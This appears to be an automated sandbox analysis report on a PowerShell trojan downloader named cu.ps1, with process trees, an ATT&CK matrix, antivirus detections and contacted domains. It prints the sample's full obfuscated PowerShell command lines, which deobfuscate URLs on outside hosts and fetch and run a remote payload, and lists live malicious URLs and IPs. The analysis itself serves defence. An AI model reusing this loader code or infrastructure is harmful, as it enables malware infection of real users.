          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW*
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000007.00000002.2752630395.0000022536E5D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: amsi64_7372.amsi.csv, type: OTHER
          Source: Yara match | File source: amsi64_8008.amsi.csv, type: OTHER
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 111 Scripting | Valid Accounts | 12 Command and Scripting Interpreter | 111 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1568998  Sample: cu.ps1  Startdate: 05/12/2024  Architecture: WINDOWS  Score: 100
          Start (node 2):
            DNS/IP: www.fornid.com; fornid.com; 5 other IPs or domains
            Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
            Started: powershell.exe 16 23 (node 9)
          powershell.exe (node 9):
            DNS/IP: fornid.com 93.95.216.175, 443, 49709 SERVERPLAN-ASIT Italy; www.pineappletech.ae 91.193.42.13, 443, 49710 ITFPL Belgium
            Dropped: C:\Users\Public\tq5.vbs, ASCII
            Signatures: Powershell creates an autostart link
            Started: wscript.exe 1 (node 14); powershell.exe 23 (node 17); conhost.exe (node 19)
          wscript.exe (node 14):
            Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 2 other signatures
            Started: powershell.exe 29 (node 21)
          powershell.exe (node 17):
            Signatures: Loading BitLocker PowerShell Module
          powershell.exe (node 21):
            DNS/IP: erp-royal-crown.info 148.251.114.233, 443, 49713, 49716 HETZNER-ASDE Germany; almrwad.com 184.171.244.231, 443, 49711, 49712 DIMENOCUS United States
            Started: conhost.exe (node 24); cmd.exe 1 (node 26)

          Source | Detection | Scanner | Label
          cu.ps1 | 32% | ReversingLabs | Script-PowerShell.Trojan.PShell
          cu.ps1 | 100% | Avira | TR/PShell.Dldr.VPA
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          https://www.fornid.com/ordine | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordine | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Su | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordineren | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/wh/List | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerend | 100% | Avira URL Cloud | phishing
          https://www.almrwad.com/w | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordiner | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/ | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerende | 100% | Avira URL Cloud | phishing
          https://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
          http://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
          https://www.almrwad.c | 0% | Avira URL Cloud | safe
          https://www.fornid.com/133-occhiali-protettivi | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.i | 0% | Avira URL Cloud | safe
          http://www.pineappletech.ae | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordine | 100% | Avira URL Cloud | phishing
          https://www.pineappletech.ae/na/mg.vbs | 100% | Avira URL Cloud | malware
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css | 0% | Avira URL Cloud | safe
          https://www.fornid.com/90-maschere-per-saldatura | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordin | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/ | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smip | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/contattaci | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subord | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes7 | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/ | 0% | Avira URL Cloud | safe
          https://www.almrwad.com | 0% | Avira URL Cloud | safe
          https://go.micro | 0% | Avira URL Cloud | safe
          https://www.fornid.com | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerende | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes78.s | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes78.sm | 0% | Avira URL Cloud | safe
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | 100% | Avira URL Cloud | malware
          http://www.fornid.com/ | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes78 | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subord | 100% | Avira URL Cloud | phishing
          http://almrwad.com | 0% | Avira URL Cloud | safe
          https://www.fornid.com/144-filtri-per-maschere | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/w | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3 | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware
          https://www.erp-royal-crown. | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh | 100% | Avira URL Cloud | phishing
          http://fornid.com | 0% | Avira URL Cloud | safe
          https://www.fornid.com/sitemap | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinere | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/145-maschere-antigas | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subor | 100% | Avira URL Cloud | phishing
          https://www.erp-royal-crown.info/wh/Subordi | 100% | Avira URL Cloud | phishing
          https://www.almrwad.com/wh/Subordinerend | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subo | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/il-mio-account | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinere | 0% | Avira URL Cloud | safe
          http://www.almrwad.com | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.in | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subordinerendes78. | 0% | Avira URL Cloud | safe
          https://www.almrwad.co | 0% | Avira URL Cloud | safe
          http://erp-royal-crown.info | 100% | Avira URL Cloud | phishing
          https://www.almrwad.com/wh/Subordi | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerendes | 100% | Avira URL Cloud | phishing
          https://www.pinznvapplznvtznvch.aznv/na/mg.vbs | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.s | 100% | Avira URL Cloud | phishing
          https://www.fornid.com/img/logo.jpg | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Sub | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordin | 100% | Avira URL Cloud | phishing
          http://blog.fornid.com/ | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerendes78 | 100% | Avira URL Cloud | phishing
          https://www.almrwad.com/wh/Subo | 0% | Avira URL Cloud | safe
          http://www.fornid.com/content/13-international-shipments | 0% | Avira URL Cloud | safe
          https://www.almrwad.com/wh/Subor | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Su0 | 100% | Avira URL Cloud | phishing
          https://www.almrwad. | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/wh/Subordinerendes7 | 100% | Avira URL Cloud | phishing
          http://www.fornid.com | 0% | Avira URL Cloud | safe
          https://www.fornid.com/cerca | 0% | Avira URL Cloud | safe
          https://www.erp-royal-crown.info/ | 100% | Avira URL Cloud | phishing
          https://www.almrwad.com/wh/Subordineren | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Reputation
          erp-royal-crown.info | 148.251.114.233 | true | false | unknown
          almrwad.com | 184.171.244.231 | true | false | unknown
          fornid.com | 93.95.216.175 | true | true | unknown
          www.pineappletech.ae | 91.193.42.13 | true | false | unknown
